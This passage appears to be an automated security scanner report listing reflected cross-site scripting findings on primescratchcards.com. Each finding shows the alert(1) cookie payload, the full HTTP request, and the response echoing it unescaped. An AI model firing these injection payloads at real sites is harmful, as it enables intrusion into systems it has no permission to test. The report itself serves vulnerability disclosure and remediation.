Date: Mon, 16 May 2011 12:38:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19396
Content-Type: text/html
Set-Cookie: ARC=130137dcc5b%27%3Balert%281%29%2F%2F703cebd666; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137dcc5b';alert(1)//703cebd666&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.110. http://primescratchcards.com/images/aboutus.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/aboutus.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 4d39c--><script>alert(1)</script>62968452208 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374d39c--><script>alert(1)</script>62968452208; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301374d39c%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E62968452208; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301374d39c--><script>alert(1)</script>62968452208">
...[SNIP]...

3.111. http://primescratchcards.com/images/aboutus.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/aboutus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2596a"%3balert(1)//e55764e40a4 was submitted in the ARC cookie. This input was echoed as 2596a";alert(1)//e55764e40a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301372596a"%3balert(1)//e55764e40a4; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301372596a%22%3Balert%281%29%2F%2Fe55764e40a4; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301372596a";alert(1)//e55764e40a4' border='0' width='1' height='1'>
...[SNIP]...

3.112. http://primescratchcards.com/images/affiliates.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/affiliates.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload f636d--><script>alert(1)</script>bab01666262 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f636d--><script>alert(1)</script>bab01666262; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137f636d%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebab01666262; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137f636d--><script>alert(1)</script>bab01666262">
...[SNIP]...

3.113. http://primescratchcards.com/images/affiliates.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/affiliates.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46fe5'%3balert(1)//65cb78f18b8 was submitted in the ARC cookie. This input was echoed as 46fe5';alert(1)//65cb78f18b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013746fe5'%3balert(1)//65cb78f18b8; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013746fe5%27%3Balert%281%29%2F%2F65cb78f18b8; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013746fe5';alert(1)//65cb78f18b8&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.114. http://primescratchcards.com/images/affiliates.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/affiliates.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fa3b"%3balert(1)//d22930547e was submitted in the ARC cookie. This input was echoed as 3fa3b";alert(1)//d22930547e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301373fa3b"%3balert(1)//d22930547e; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19396
Content-Type: text/html
Set-Cookie: ARC=1301373fa3b%22%3Balert%281%29%2F%2Fd22930547e; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301373fa3b";alert(1)//d22930547e' border='0' width='1' height='1'>
...[SNIP]...

3.115. http://primescratchcards.com/images/bg.jpg [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/bg.jpg

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c354'%3balert(1)//78c486a4ea7 was submitted in the ARC cookie. This input was echoed as 2c354';alert(1)//78c486a4ea7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bg.jpg HTTP/1.1
Host: primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=1301372c354'%3balert(1)//78c486a4ea7

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301372c354%27%3Balert%281%29%2F%2F78c486a4ea7; expires=Tue, 15-May-2012 11:42:02 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=BKMOLGNDNJKAKAFGLDIAGACP; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301372c354';alert(1)//78c486a4ea7&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.116. http://primescratchcards.com/images/bg.jpg [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/bg.jpg

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 11f92--><script>alert(1)</script>092fca28c0d was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/bg.jpg HTTP/1.1
Host: primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=13013711f92--><script>alert(1)</script>092fca28c0d

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=13013711f92%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E092fca28c0d; expires=Tue, 15-May-2012 11:42:04 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=HKMOLGNDNIHAGDGLIENJFGLH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="13013711f92--><script>alert(1)</script>092fca28c0d">
...[SNIP]...

3.117. http://primescratchcards.com/images/bg.jpg [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/bg.jpg

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3566c"%3balert(1)//052f6e6caae was submitted in the ARC cookie. This input was echoed as 3566c";alert(1)//052f6e6caae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bg.jpg HTTP/1.1
Host: primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=1301373566c"%3balert(1)//052f6e6caae

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301373566c%22%3Balert%281%29%2F%2F052f6e6caae; expires=Tue, 15-May-2012 11:42:00 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=NJMOLGNDOCCNBEMDLFHPBAKN; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301373566c";alert(1)//052f6e6caae' border='0' width='1' height='1'>
...[SNIP]...

3.118. http://primescratchcards.com/images/contactus.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/contactus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f815d"%3balert(1)//a08662a17ad was submitted in the ARC cookie. This input was echoed as f815d";alert(1)//a08662a17ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f815d"%3balert(1)//a08662a17ad; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137f815d%22%3Balert%281%29%2F%2Fa08662a17ad; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137f815d";alert(1)//a08662a17ad' border='0' width='1' height='1'>
...[SNIP]...

3.119. http://primescratchcards.com/images/contactus.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/contactus.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 63c7a--><script>alert(1)</script>78f7646a362 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013763c7a--><script>alert(1)</script>78f7646a362; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=13013763c7a%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E78f7646a362; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="13013763c7a--><script>alert(1)</script>78f7646a362">
...[SNIP]...

3.120. http://primescratchcards.com/images/contactus.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/contactus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bef4'%3balert(1)//6be503d7a62 was submitted in the ARC cookie. This input was echoed as 5bef4';alert(1)//6be503d7a62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301375bef4'%3balert(1)//6be503d7a62; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301375bef4%27%3Balert%281%29%2F%2F6be503d7a62; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301375bef4';alert(1)//6be503d7a62&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.121. http://primescratchcards.com/images/fairplay.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/fairplay.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f253"%3balert(1)//b5a37874c72 was submitted in the ARC cookie. This input was echoed as 4f253";alert(1)//b5a37874c72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374f253"%3balert(1)//b5a37874c72; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301374f253%22%3Balert%281%29%2F%2Fb5a37874c72; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301374f253";alert(1)//b5a37874c72' border='0' width='1' height='1'>
...[SNIP]...

3.122. http://primescratchcards.com/images/fairplay.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/fairplay.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f04e'%3balert(1)//09abbe83f8b was submitted in the ARC cookie. This input was echoed as 6f04e';alert(1)//09abbe83f8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301376f04e'%3balert(1)//09abbe83f8b; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301376f04e%27%3Balert%281%29%2F%2F09abbe83f8b; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
